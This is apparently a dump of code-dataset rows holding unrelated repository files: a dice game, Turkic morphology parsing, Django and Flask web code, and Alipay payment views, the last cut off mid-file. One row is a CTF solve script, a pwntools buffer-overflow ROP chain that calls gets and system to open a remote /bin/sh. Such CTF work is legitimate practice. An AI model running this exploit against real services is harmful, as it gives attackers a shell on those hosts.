seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
20494000483
|
import random
class CaraCoroa:
def __init__(self):
self.lado = 'Cara'
def lancar(self):
if random.randint(0, 1) % 2 == 0:
self.lado = 'Cara'.upper()
return self.lado
else:
self.lado = 'Coroa'.upper()
return self.lado
class Dado:
def __init__(self):
self.lado = 1
def lancar(self):
return random.randint(1, 6)
if __name__ == '__main__':
moeda = CaraCoroa()
dado = Dado()
op = 1
while op:
print()
op = int(input('0. Sair\n1. Lançar Moeda\n2. Lançar Dado\nOpção: '))
if op == 1:
print(moeda.lancar())
elif op == 2:
print(dado.lancar())
else:
print('Saindo do jogo...')
|
Adriano1976/Curso-de-Python
|
Secao04-Introducao-a-POO/Aula097-Classes/Jogo - Cara Coroa e Dados.py
|
Jogo - Cara Coroa e Dados.py
|
py
| 776 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
25208341216
|
#/usr/bin/python3
from pwn import *
context.arch = 'amd64'
PATH = 'src/chall'
HOST = '54.179.233.189'
PORT = 8001
GDBSOURCE = ['~/peda/peda.py', '~/pwndbg/gdbinit.py']
LIBC_DBG = {
'16.04' : ['~/debug/ubuntu-16.04/dbg64/', '~/debug/ubuntu-16.04/dbg64/libc-2.23.so'],
'18.04' : ['~/debug/ubuntu-18.04/dbg64/', '~/debug/ubuntu-18.04/dbg64/libc-2.27.so'],
'20.04' : ['~/debug/ubuntu-20.04/dbg64/', '~/debug/ubuntu-20.04/dbg64/libc-2.31.so'],
'20.10' : ['~/debug/ubuntu-20.10/dbg64/', '~/debug/ubuntu-20.10/dbg64/libc-2.32.so'],
}
GDBSCRIPT = '''
b *main+246
set follow-fork-mode parent
'''
def debug(gdbscript, gdbsrc = 0, libc = None):
if type(r) == process:
scripts = [
f'source ~/debug/loadsym.py',
f'source ~/gdb_sigwait/src/sighandler.gdb',
f'source {GDBSOURCE[gdbsrc]}',
]
if libc != None:
scripts += [
f'set debug-file-directory {LIBC_DBG[libc][0]}',
f'loadsym {LIBC_DBG[libc][1]}'
]
gdb.attach(r, '\n'.join(scripts) + gdbscript)
def exploit(r):
pop_rdi_ret = 0x0000000000401383
payload = b'A' * 0x48
payload += p64(0xdeadbeef) * 2
payload += p64(pop_rdi_ret)
payload += p64(elf.bss(0x100))
payload += p64(pop_rdi_ret+1)
payload += p64(elf.sym.gets)
payload += p64(pop_rdi_ret)
payload += p64(elf.bss(0x100))
payload += p64(pop_rdi_ret+1)
payload += p64(elf.sym.system)
# debug(GDBSCRIPT, gdbsrc = 0, libc = None)
r.sendlineafter(b"> ", payload)
pause()
r.sendline(b"/bin/sh")
r.interactive()
if __name__ == '__main__':
elf = ELF(PATH, checksec = True)
# libc = ELF(elf.libc.path, checksec = False)
if args.REMOTE:
r = remote(HOST, PORT)
else:
r = elf.process(aslr = 0, env = {})
exploit(r)
|
bl33dz/ForestyCTF
|
Binary Exploitation/bof/solve.py
|
solve.py
|
py
| 1,854 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20181255699
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 5 12:37:51 2017
@author: vital
"""
import pickle
import networkx as nx
import codecs
import re
from morph import dictionaries as dic
from morph import lemmas_dict as lem
from config import basedir
from app import models, db
G = pickle.loads(models.Graph.query.filter_by(lang='oldturkic').first().graph)
def get_lem(word):
result = {}
if word in lem.lemmas_dict:
result[word] = lem.lemmas_dict[word]
else:
for lemma in lem.lemmas_dict:
if lemma == word[:len(lemma)]:
if lem.lemmas_dict[lemma] not in dic.non_inflected:
result[lemma] = lem.lemmas_dict[lemma]
return result
def last_possible_aff(word):
result = []
for n in G.nodes():
for (aff, tag) in G.node[n]:
if aff == word[-len(aff):]:
result.append([((aff, tag), word[:-len(aff)])])
return result
def get_next_aff(affix, chain):
result = []
for node in G.nodes():
if affix in G.node[node]:
for next_node in G.successors(node):
for next_aff in G.node[next_node]:
if next_aff[0] == chain[-len(next_aff[0]):]:
next_chain = chain[:-len(next_aff[0])]
result.append((next_aff, next_chain))
return result
def one_step(lst):
last_aff = lst[len(lst)-1]
next_aff = get_next_aff(last_aff[0], last_aff[1])
result = []
for aff in next_aff:
next_lst = lst.copy()
next_lst.append(aff)
result.append(next_lst)
return result
def check_for_lemma(list_of_possible_pars):
lst = list_of_possible_pars
if lst[len(lst)-1][1] in lem.lemmas_dict:
return lst
def check_list_for_pars(lst):
count = []
for l in lst:
step = one_step(l)
if step == []:
z=False
count.append(z)
else:
z=True
count.append(z)
if True in count: return True
else: return False
def predict_pos(first_aff):
result = []
for node in G.nodes():
if first_aff in G.node[node]:
for p in dic.pos:
if p in G.successors(node):
result.append(p)
res = '/'.join(result)
return res
def reverse_pars(pars, word):
result = []
possible_lemmas = get_lem(word)
lemma_aff = pars.pop()
first_aff = lemma_aff[0]
if lemma_aff[1] in possible_lemmas:
lemma = (lemma_aff[1], possible_lemmas[lemma_aff[1]])
else:
lemma = (lemma_aff[1], predict_pos(first_aff))
for morph in pars:
result.append(morph[0])
result.append(first_aff)
result.append(lemma)
result.reverse()
return result
def filter_pars(parses):
result = []
order = [5,4,6,3,7,8,9,10,11,12,13,14,15,16,17,18]
for l in order:
for p in parses:
if len(p[0][0]) == l:
result.append(p)
return result
def parsing(word):
start = last_possible_aff(word)
while check_list_for_pars(start) == True:
result = []
for lst in start:
if len(one_step(lst)) == 0:
result.append(lst)
continue
else:
result.extend(one_step(lst))
start = result
return start
def pars_analyse(w):
possible_lemmas = get_lem(w)
result = []
if possible_lemmas != {}:
if w in possible_lemmas:
return [[(w, possible_lemmas[w])]]
else:
for l in possible_lemmas:
chain = w[len(l):]
possible_parses = parsing(chain)
parses = [pars for pars in possible_parses if pars[len(pars)-1][1] == '']
for p in parses:
tmp = []
if possible_lemmas[l] in predict_pos(p[len(p)-1][0]):
for morph in p:
tmp.append(morph[0])
tmp.append((l, possible_lemmas[l]))
tmp.reverse()
result.append(tmp)
if result == []:
possible_parses = parsing(w)
for pars in possible_parses:
tmp = []
lemma_aff = pars.pop()
first_aff = lemma_aff[0]
lemma = (lemma_aff[1], predict_pos(first_aff))
if pars == []:
tmp.append(lemma)
tmp.append(first_aff)
result.append(tmp)
else:
for morph in pars:
tmp.append(morph[0])
tmp.append(first_aff)
tmp.append(lemma)
tmp.reverse()
result.append(tmp)
result = filter_pars(result)
result = [e for i,e in enumerate(result) if e not in result[:i]]
return result
def tag_interpretation(pars, lang):
result = ""
for morpheme in pars:
tag = morpheme[1]
if ',' in tag:
tmp = tag.split(',')
for t in tmp:
if '/' in t:
for tt in t.split('/'):
result += dic.interpretation[tt][lang] + ' / '
result += '+ '
else:
result += dic.interpretation[t][lang] + ' + '
else:
if 'S' and 'SPRON' and 'ADJ' in tag.split('/'):
tag = 'NAME'
result += dic.interpretation[tag][lang] + ' + '
elif '/' in tag:
for t in tag.spilt('/'):
result += dic.interpretation[tag][lang] + ' / '
result += '+ '
else:
result += dic.interpretation[tag][lang] + ' + '
return result[0:len(result)-3]
|
vetka925/oldturkicmorph-web
|
morph/morph_analysis.py
|
morph_analysis.py
|
py
| 5,750 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14839168624
|
from django.contrib.auth import get_user_model
from django.shortcuts import get_object_or_404, render, redirect
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator
from django.conf import settings
from .forms import PostForm, CommentForm
from .models import Post, Group, User, Follow
User = get_user_model()
def paginator(request, object_list, per_page):
paginate = Paginator(object_list, per_page)
page_number = request.GET.get('page')
page_obj = paginate.get_page(page_number)
return page_obj
def index(request):
posts = Post.objects.select_related('author', 'group')
page_obj = paginator(request, posts, settings.SORT_POSTS)
template = 'posts/index.html'
context = {
'posts': posts,
'page_obj': page_obj,
}
return render(request, template, context)
def group_posts(request, slug):
group = get_object_or_404(Group, slug=slug)
posts = group.groups.select_related('author')
page_obj = paginator(request, posts, settings.SORT_POSTS)
template = 'posts/group_list.html'
context = {
'group': group,
'posts': posts,
'page_obj': page_obj,
}
return render(request, template, context)
def profile(request, username):
author = get_object_or_404(User, username=username)
posts = author.posts.select_related('group')
count = posts.count()
following = request.user.is_authenticated and Follow.objects.filter(
user=request.user,
author=author
)
page_obj = paginator(request, posts, settings.SORT_POSTS)
context = {
'page_obj': page_obj,
'count': count,
'author': author,
'following': following,
}
template = 'posts/profile.html'
return render(request, template, context)
def post_detail(request, post_id):
post = get_object_or_404(Post, pk=post_id)
post_title = post.text[:30]
form = CommentForm(request.POST or None)
author = post.author
author_posts = author.posts.all().count()
comments = post.comments.select_related('author')
context = {
'post': post,
'post_title': post_title,
'author': author,
'author_posts': author_posts,
'form': form,
'comments': comments,
}
template = 'posts/post_detail.html'
return render(request, template, context)
@login_required
def post_create(request):
form = PostForm(request.POST or None, files=request.FILES or None)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.save()
return redirect('posts:profile', request.user)
template = 'posts/create_post.html'
context = {'form': form}
return render(request, template, context)
@login_required
def post_edit(request, post_id):
post = get_object_or_404(Post, pk=post_id)
form = PostForm(
request.POST or None,
files=request.FILES or None,
instance=post
)
if post.author != request.user:
return redirect('posts:post_detail', post_id)
if form.is_valid():
edited_post = form.save()
edited_post.save()
return redirect('posts:post_detail', post_id)
context = {
'form': form,
'is_edit': True,
'post': post,
}
template = 'posts/create_post.html'
return render(request, template, context)
@login_required
def add_comment(request, post_id):
post = get_object_or_404(Post, id=post_id)
form = CommentForm(request.POST or None)
if form.is_valid():
comment = form.save(commit=False)
comment.author = request.user
comment.post = post
comment.save()
return redirect('posts:post_detail', post_id=post_id)
@login_required
def follow_index(request):
post_list = Post.objects.filter(author__following__user=request.user)
page_obj = paginator(request, post_list, settings.SORT_POSTS)
context = {
'page_obj': page_obj,
}
return render(request, 'posts/follow.html', context)
@login_required
def profile_follow(request, username):
author = get_object_or_404(User, username=username)
if author != request.user:
Follow.objects.get_or_create(user=request.user, author=author)
return redirect('posts:profile', username)
@login_required
def profile_unfollow(request, username):
author = get_object_or_404(User, username=username)
Follow.objects.filter(user=request.user, author=author).delete()
return redirect('posts:profile', username)
|
Medbrat4669/yatube_project
|
yatube/posts/views.py
|
views.py
|
py
| 4,552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36802074369
|
#! /usr/bin/python3
import sqlite3
import pandas as pd
pd.set_option('display.max_columns', 500)
path = '/home/mayijun/CITI2017/'
# Calculate station days
conn = sqlite3.connect(path + 'CITI2017.sqlite3')
sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday NOT IN ('Saturday','Sunday')"""
start = pd.read_sql(sql, conn)
sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday NOT IN ('Saturday','Sunday')"""
end = pd.read_sql(sql, conn)
wkday = pd.concat([start, end])
wkday = wkday.drop_duplicates()
wkday = wkday.groupby(['stationid'], as_index=False)['date'].count()
wkday.columns = ['stationid', 'weekdays']
sql = """SELECT DISTINCT startstationid AS stationid,startdate AS date FROM trip WHERE startweekday IN ('Saturday','Sunday')"""
start = pd.read_sql(sql, conn)
sql = """SELECT DISTINCT endstationid AS stationid,enddate AS date FROM trip WHERE endweekday IN ('Saturday','Sunday')"""
end = pd.read_sql(sql, conn)
wkend = pd.concat([start, end])
wkend = wkend.drop_duplicates()
wkend = wkend.groupby(['stationid'], as_index=False)['date'].count()
wkend.columns = ['stationid', 'weekends']
df = pd.merge(wkday, wkend, how='outer', on='stationid')
df.to_csv(path + 'stationdays.csv', index=False, na_rep=0)
conn.close()
# Merge station list and station days
conn = sqlite3.connect(path + 'CITI2017.sqlite3')
station = pd.read_csv(path + 'station.csv')
wkd = pd.read_csv(path + 'stationdays.csv')
station=station[['stationid','stationname','stationlat','stationlong']]
df = pd.merge(station, wkd, how='outer', on='stationid').sort_values('stationid')
df.to_sql('station', conn, if_exists='replace', index=False)
conn.close()
|
NYCPlanning/td-citibike
|
2017/stationdays.py
|
stationdays.py
|
py
| 1,726 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29969194613
|
from src import EventManager, ModuleManager, utils
TAGS = {
utils.irc.MessageTag(None, "inspircd.org/bot"),
utils.irc.MessageTag(None, "draft/bot")
}
class Module(ModuleManager.BaseModule):
@utils.hook("received.376")
@utils.hook("received.422")
def botmode(self, event):
if "BOT" in event["server"].isupport:
botmode = event["server"].isupport["BOT"]
event["server"].send_raw("MODE %s +%s" % (event["server"].nickname, botmode))
@utils.hook("received.message.private")
@utils.hook("received.message.channel")
@utils.kwarg("priority", EventManager.PRIORITY_HIGH)
def message(self, event):
for tag in TAGS:
if tag.present(event["tags"]):
event.eat()
|
xfnw/bitbot
|
modules/ircv3_botignore.py
|
ircv3_botignore.py
|
py
| 756 |
python
|
en
|
code
| null |
github-code
|
6
|
12960752319
|
import warnings
warnings.filterwarnings('ignore')
from popsycle import synthetic
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table
import h5py
def test_h5_output(ebf_file, reference_h5_file, extra_col= False):
""""
Parameters
----------
ebf_file : str
Name of the ebf file used to generate the reference h5 file
reference_h5_file : str
Name of the file to compare new output to (should be run with seed=42 on the ebf_file)
extra_col : boolean, defaults to False
Tells the code whether or not the new h5 file will have additional columns (ie does the new version of
popsycle give more information than before
"""
#create the new h5 file by running popsycle
synthetic.perform_pop_syn(ebf_file = ebf_file,
output_root = 'test',
iso_dir = '/u/casey/scratch/work/microlens/popsycle_test/isochrones/',
bin_edges_number = None, overwrite = True, seed=42);
#read in the data from the reference h5 file
hfr = h5py.File(reference_h5_file, 'r')
ref_dset = np.concatenate((hfr['l0b0'], hfr['l0b1'], hfr['l1b0'], hfr['l1b1']),
axis=1)
hfr.close()
#read in the data from the test h5 file created by popsycle
hft = h5py.File('test.h5', 'r')
test_dset = np.concatenate((hft['l0b0'], hft['l0b1'], hft['l1b0'], hft['l1b1']),
axis=1)
hft.close()
#see if we have the right number of columns
if test_dset.shape[0] != ref_dset.shape[0]:
if not extra_col:
print("the h5 files are not the same size. Run again with extra_col=True if you have added columns")
#test to see whether the files are the same
matched_col=0 #initialize matched_col counter
for i in range(0, ref_dset.shape[0]):
test_col = test_dset[i,:]
ref_col = ref_dset[i, :]
if test_col.all() == ref_col.all():
matched_col = matched_col+1
#check to see if disagreements are because of nans
else:
bad_idxs = np.where(ref_col != test_col)
ref_nan_idx = np.where(ref_col == np.nan)
test_nan_idx = np.where(test_col == np.nan)
if test_nan_idx.all() == ref_nan_idx.all() and bad_idxs.all() == ref_nan_idx.all():
matched_col = matched_col+1
else:
matched_col= matched_col
print('Test failed in column', i)
if matched_col == ref_dset.shape[0]:
print("The new test h5 file matched the reference file!")
else:
print("The new test h5 file does not match the reference file")
return
synthetic.calc_events(hdf5_file = 'test.h5',
output_root2 = 'test',
radius_cut = 2,
obs_time = 1000,
n_obs = 11,
theta_frac = 2,
blend_rad = 0.65,
overwrite = True,
n_proc = 1)
synthetic.refine_events(input_root = 'test',
filter_name = 'I',
photometric_system = 'ubv',
red_law = 'Damineli16',
overwrite = True,
output_file = 'default')
hfr = h5py.File('trial_1.h5', 'r')
print((list(hfr.keys())))
dsetr = hfr['l0b0']
print(dsetr)
hfr.close()
hft = h5py.File('test.h5', 'r+')
print(list(hft.keys()))
dsett = hft['l0b0']
print(dsett)
dsett.resize((27, 176660))
print(dsett)
print('test==trial', dsetr == dsett)
hft.close()
tabr = Table.read('trial_1_refined_events_i_Damineli16.fits')
tabt = Table.read('test_refined_events_i_Damineli16.fits')
print('The col names of the trial 1 fits are:', tabr.colnames)
print('The col names of the test fits are:', tabt.colnames)
tabt.remove_columns(['teff_S', 'grav_S', 'lum_S', 'teff_L', 'grav_L', 'lum_L'])
print('Check if tables differ:', tabr == tabt)
|
jluastro/PopSyCLE
|
popsycle/tests/output_test_synthetic.py
|
output_test_synthetic.py
|
py
| 4,102 |
python
|
en
|
code
| 13 |
github-code
|
6
|
25993094849
|
from datetime import datetime
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField, FloatField
from wtforms.validators import DataRequired, Length, Regexp
class NewOrderForm(FlaskForm):
description = TextAreaField("Опис: ",
validators=[DataRequired(),
Length(max=1000)])
client = StringField('Клієнт',
id='client_autocomplete',
validators=[DataRequired(),
Length(max=200)])
created_at = StringField("Дата створення",
validators=[DataRequired(),
Regexp(
r'^(0[1-9]|[12][0-9]|3[01])[\.](0[1-9]|1[012])[\.]((19|20)\d\d|\d\d)$')],
default=datetime.now().strftime("%d.%m.%Y"))
serial = StringField("Серійний номер",
id='serial_autocomplete',
validators=[Length(max=200)])
price = FloatField("Ціна", validators=[DataRequired()])
staff = SelectField("Виконавець")
type = SelectField("Тип замовлення")
submit = SubmitField("Зберегти")
def __init__(self, order=None, staff_choices=None, type_choices=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if order:
self.description.data = order.description
self.client.data = order.client
self.created_at.data = order.created_at.strftime("%d.%m.%Y")
self.serial.data = order.device.serial
self.price.data = order.price
self.staff.data = order.staff.name
self.type.data = order.type.name
if staff_choices:
self.staff.choices = staff_choices
if type_choices:
self.type.choices = type_choices
class NewClientForm(FlaskForm):
name = StringField("Ім'я фізичної або юридичної особи",
validators=[DataRequired(),
Length(max=200)])
# validators = [Regexp(r'^(\+\d{1,2}\s?)?((\(?\d{3}\)?)[\s]?\d{3}[\s]?\d{4}|(\(?\d{3,4}\)?)[\s]?\d{3}[\s]?\d{3})$')]
phone = StringField("Номер телефону",
validators=[DataRequired(),
Length(max=80)])
address = StringField("Адреса",
validators=[Length(max=200)])
notes = TextAreaField("Примітки",
validators=[Length(max=1000)])
submit = SubmitField("Зберегти")
def __init__(self, client=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if client:
self.name.data = client.name
self.phone.data = client.phone
self.address.data = client.address
self.notes.data = client.notes
class NewDeviceForm(FlaskForm):
name = StringField("Назва")
serial = StringField("Серійний номер", validators=[DataRequired()])
submit = SubmitField("Зберегти")
def __init__(self, device=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if device:
self.name.data = device.name
self.serial.data = device.serial
class NewStaffForm(FlaskForm):
name = StringField("Ім'я")
submit = SubmitField("Зберегти")
class DeleteConfirmForm(FlaskForm):
delete = SubmitField("Так, видалити")
class NavigationForm(FlaskForm):
search_field = StringField("Введіть пошуковий запит")
status_field = SelectField('Статус')
type_field = SelectField('Тип')
sort_by_field = SelectField('Сортувати за', choices=[('new_first', 'Датою (нові спочатку)'),
('old_first', 'Датою (старі спочатку)'),
('client', 'Клієнтом'),
('status', 'Статусом')])
def __init__(self, status_choices=None, type_choices=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if status_choices:
self.status_field.choices = status_choices
if type_choices:
self.type_field.choices = type_choices
|
1Lorde/orders-tracker
|
orders_tracker/forms.py
|
forms.py
|
py
| 4,563 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16760366561
|
from django.shortcuts import render,redirect,get_object_or_404
# CSRF
from django.views.decorators.csrf import csrf_exempt
from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from django.utils.encoding import force_bytes, force_text
from django.core.mail import BadHeaderError, send_mail
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.sites.shortcuts import get_current_site
from django.template.loader import render_to_string
from django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from django.utils.encoding import force_bytes, force_text
from django.contrib import messages
import pdb
def home(request):
return render(request, 'index.html')
# def contact(request):
# return render(request, 'contact.html')
@csrf_exempt
def sendemail(request):
username = request.POST.get('username')
subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다."
message = request.POST.get('message')
useremail = request.POST.get("useremail")
if subject and message and useremail:
try:
send_mail(subject, message, useremail, ["[email protected]"])
except BadHeaderError:
return HttpResponse('Invalid header found.')
return redirect('home')
else:
return HttpResponse("정확하게 입력해주세요.")
@csrf_exempt
def contact(request):
if request.method == "POST":
username = request.POST["username"]
subject = "돌직구 사용자"+ username+ "님이 보내신 문의 메일입니다."
message = request.POST["message"]
useremail = request.POST["useremail"]
emailContent = render_to_string('email.html', {
"subject": subject,
"useremail": useremail,
"message":message,
})
emailAddress = "[email protected]"
emailObject = EmailMessage(subject, emailContent, to=[emailAddress])
emailObject.content_subtype = "html"
result = emailObject.send()
if result == 1:
messages.info(request, "성공적으로 문의가 돌직구에 전달되었습니다.")
else:
messgaes.info(request, "문의에 실패하였습니다.")
return redirect('contact')
else:
return render(request, 'contact.html')
|
suna-ji/RockJiggu
|
RockJiggu/views.py
|
views.py
|
py
| 2,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13956703300
|
from django.db.models import Field
from . import forms
from . import validators
from .ipv6cidr import clean_ipv6_cidr
from django.utils.translation import gettext_lazy as _, ngettext_lazy
class GenericIPNetworkField(Field):
"""
Support CIDR input
ipv4 0.0.0.0/0
ipv6 ::::/0
"""
empty_strings_allowed = False
description = _("GenericIPNetworkField")
default_error_messages = {}
def __init__(self, verbose_name=None, name=None, protocol='both',
*args, **kwargs):
self.protocol = protocol
self.default_validators, invalid_error_message = \
validators.ip_network_validators(protocol)
self.default_error_messages['invalid'] = invalid_error_message
kwargs['max_length'] = 43 # ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128
super().__init__(verbose_name, name, *args, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_blank_and_null_values(**kwargs))
return errors
def _check_blank_and_null_values(self, **kwargs):
if not getattr(self, 'null', False) and getattr(self, 'blank', False):
return [
checks.Error(
'GenericIPNetworkField cannot have blank=True if null=False, '
'as blank values are stored as nulls.',
obj=self,
id='fields.E150',
)
]
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.protocol != "both":
kwargs['protocol'] = self.protocol
if kwargs.get("max_length") == 43:
del kwargs['max_length']
return name, path, args, kwargs
def get_internal_type(self):
return "GenericIPNetworkField"
def to_python(self, value):
import ipdb;ipdb.set_trace()
if value is None:
return None
if not isinstance(value, str):
value = str(value)
value = value.strip()
if ':' in value:
return clean_ipv6_network(value, self.unpack_ipv4, self.error_messages['invalid'])
return value
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
return connection.ops.adapt_ipaddressfield_value(value)
def get_prep_value(self, value):
value = super().get_prep_value(value)
if value is None:
return None
if value and ':' in value:
try:
return clean_ipv6_cidr(value)
except exceptions.ValidationError:
pass
return str(value)
def formfield(self, **kwargs):
defaults = {
'protocol': self.protocol,
'form_class': forms.GenericIPNetworkField,
}
defaults.update(kwargs)
return super().formfield(**defaults)
|
MilkBotttle/BFP
|
fields/cidr.py
|
cidr.py
|
py
| 2,978 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31228319050
|
#coding=utf-8
from thuproxy.alipay_api import *
from thuproxy.proxy_account_views import *
import datetime
import uuid
import urllib.request
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, RequestContext
# 优惠比率
RATE = 0.6
# 根据支付类型选择策略
@login_required(login_url="/login/")
def alipay_apply(request, pay_type):
is_user_login = request.user.is_authenticated()
user = request.user
proxy_account = ProxyAccount.objects.get(user=request.user)
pay_list = Pay.objects.filter(user_id=user.id, status='U')
if len(pay_list) != 0:
request.session["error"] = "need_repay"
return HttpResponseRedirect('/homepage')
# 判断支付类型
if pay_type == 'first':
if proxy_account.expired_date is not None:
request.session["error"] = "first_pay"
return HttpResponseRedirect('/homepage')
return render_to_response('alipay_create_order_first.html', locals(), context_instance=RequestContext(request))
elif pay_type == 'upgrade':
if proxy_account.type == 50:
request.session["error"] = "upgrade"
return HttpResponseRedirect('/homepage')
if datetime.datetime.now().date() < proxy_account.expired_date:
remain_time = proxy_account.expired_date - datetime.datetime.now().date()
proxy_account.remain_time = int(remain_time.days)
elif datetime.datetime.now().date() >= proxy_account.expired_date:
request.session["error"] = "date"
return HttpResponseRedirect('/homepage')
return render_to_response('alipay_create_order_upgrade.html', locals(),
context_instance=RequestContext(request))
elif pay_type == 'downgrade':
if proxy_account.type == 1:
request.session["error"] = "downgrade"
return HttpResponseRedirect('/homepage')
remain_time = proxy_account.expired_date - datetime.datetime.now().date()
proxy_account.remain_time = int(remain_time.days)
return render_to_response('alipay_create_order_downgrade.html', locals(),
context_instance=RequestContext(request))
elif pay_type == 'continue':
return render_to_response('alipay_create_order_continue.html', locals(),
context_instance=RequestContext(request))
else:
return HttpResponse('充值请求错误')
# 生成订单
@login_required(login_url="/login/")
def alipay_create_orders(request):
is_user_login = request.user.is_authenticated()
user = request.user
proxy_account = ProxyAccount.objects.get(user=request.user)
m = request.POST['money']
money = float(m) * RATE
money = round(money, 2)
pay_type = int(request.POST['pay_type'])
today = timezone.now()
try:
# 升级的情况下,需要记录的是账号剩余天数而非需要付费的月数
if pay_type == 3:
day = request.POST['day']
pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type),
month=int(day), status='U', create_date=today)
else:
month = request.POST['month']
pay = Pay(out_trade_no=uuid.uuid1().hex, user=user, total_fee=money, type=int(pay_type),
month=int(month), status='U', create_date=today)
pay.save()
params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速',
'body': u'流量购买费用', 'total_fee': str(money)}
total_fee = pay.total_fee
alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback",
returnurl="http://scholar.thucloud.com/alipay/success",
showurl="http://scholar.thucloud.com/alipay/success")
params.update(alipay.conf)
sign = alipay.buildSign(params)
return render_to_response('alipay_show_order.html', locals())
except Exception as e:
print(e)
return HttpResponse('生成订单错误')
# 生成需要重新支付的订单
@login_required(login_url="/login/")
def alipay_repay_orders(request, pay_no):
is_user_login = request.user.is_authenticated()
user = request.user
proxy_account = ProxyAccount.objects.get(user=request.user)
try:
pay_list = Pay.objects.filter(out_trade_no=pay_no)
if len(pay_list) != 1:
request.session["error"] = "repay"
return HttpResponseRedirect('/homepage')
else:
pay = pay_list[0]
params = {'out_trade_no': pay.out_trade_no, 'subject': u'清云加速',
'body': u'流量购买费用', 'total_fee': str(pay.total_fee)}
total_fee = pay.total_fee
alipay = Alipay(notifyurl="http://scholar.thucloud.com/alipay/callback",
returnurl="http://scholar.thucloud.com/alipay/success",
showurl="http://scholar.thucloud.com/alipay/success")
params.update(alipay.conf)
sign = alipay.buildSign(params)
money = pay.total_fee
return render_to_response('alipay_show_order.html', locals())
except Exception as e:
print(e)
return HttpResponse('显示订单错误')
@csrf_exempt
def alipay_callback(request):
try:
print(datetime.datetime.now())
print("call back start")
params = request.POST.dict()
if not isinstance(params, dict):
print('error params not dict')
alipay = Alipay()
# 判断是否为有效返回
sign = None
if 'sign' in params:
sign = params['sign']
loc_sign = alipay.buildSign(params)
if sign is None or loc_sign != sign:
return HttpResponse("fail")
print("sign is ok")
# 判断交易状态是否有效,以免重复判断交易成功
if params['trade_status'] != 'TRADE_FINISHED' and params['trade_status'] != 'TRADE_SUCCESS':
print('trade status error')
return HttpResponse("fail")
else:
print("trade status ok")
print("url: ")
url = verifyURL['https'] + "&partner=%s¬ify_id=%s" % (alipay.conf['partner'], params['notify_id'])
print(url)
response = urllib.request.urlopen(url)
html = response.read()
print("aliypay.com return: %s" % html)
# 支付宝返回有效信息
if html == b'true':
print('result is true')
try:
out_trade_no = params['out_trade_no']
print('out trade no ', out_trade_no)
trade_no = params['trade_no']
print('trade no ', trade_no)
total_fee = params['total_fee']
pay = Pay.objects.get(out_trade_no=out_trade_no)
# todo: handle other error status
if pay is None:
return HttpResponse("无此订单,请重新下单")
if pay.status == 'S':
return HttpResponse("已经成功支付了")
print('user', pay.user)
proxy_account = ProxyAccount.objects.get(user=pay.user)
print('proxy_account', proxy_account)
print('pay total fee', pay.total_fee)
month = pay.month
pay_type = pay.type
real_fee = float(total_fee) / RATE
print('month', month)
print('pay type', pay_type)
print('real fee', real_fee)
# 初次缴费
if pay_type == 1:
account_type = int(real_fee)/int(month)
print("accounttype", account_type)
if account_type not in {1, 5, 10, 20, 50}:
return HttpResponse("accout_type_error")
else:
print("success:", account_type, " month", month)
proxy_account.type = account_type
today = datetime.datetime.now()
if proxy_account.expired_date is not None:
return HttpResponse("not init")
else:
print("init date")
expired_date = today + datetime.timedelta(30*int(month))
if proxy_account.paydate is None:
create_pac(proxy_account)
print("create_pac done")
open_listen_port(proxy_account.port, proxy_account.type)
print("open_listen_port done")
proxy_account.paydate = today
proxy_account.expired_date = expired_date
elif pay_type == 2: # 续费
account_type = int(real_fee)/int(month)
print("accounttype", account_type)
if account_type != proxy_account.type or proxy_account.expired_date is None:
return HttpResponse("accout_type_error")
else:
print("success:", account_type, " month", month)
today = datetime.date.today()
print("add month")
if proxy_account.expired_date < today: # 欠费啦
expired_date = today + datetime.timedelta(30*int(month))
reopen_port(proxy_account.port)
else:
expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month))
proxy_account.expired_date = expired_date
elif pay_type == 3: # 升级
today = datetime.date.today()
if proxy_account.expired_date < today: # 欠费啦
return HttpResponse("fail")
upgrade_delta = (real_fee/month)*30
upgrade_delta = int(upgrade_delta+0.1)
print(upgrade_delta)
proxy_account.type += upgrade_delta
if proxy_account.type not in {1, 5, 10, 20, 50}:
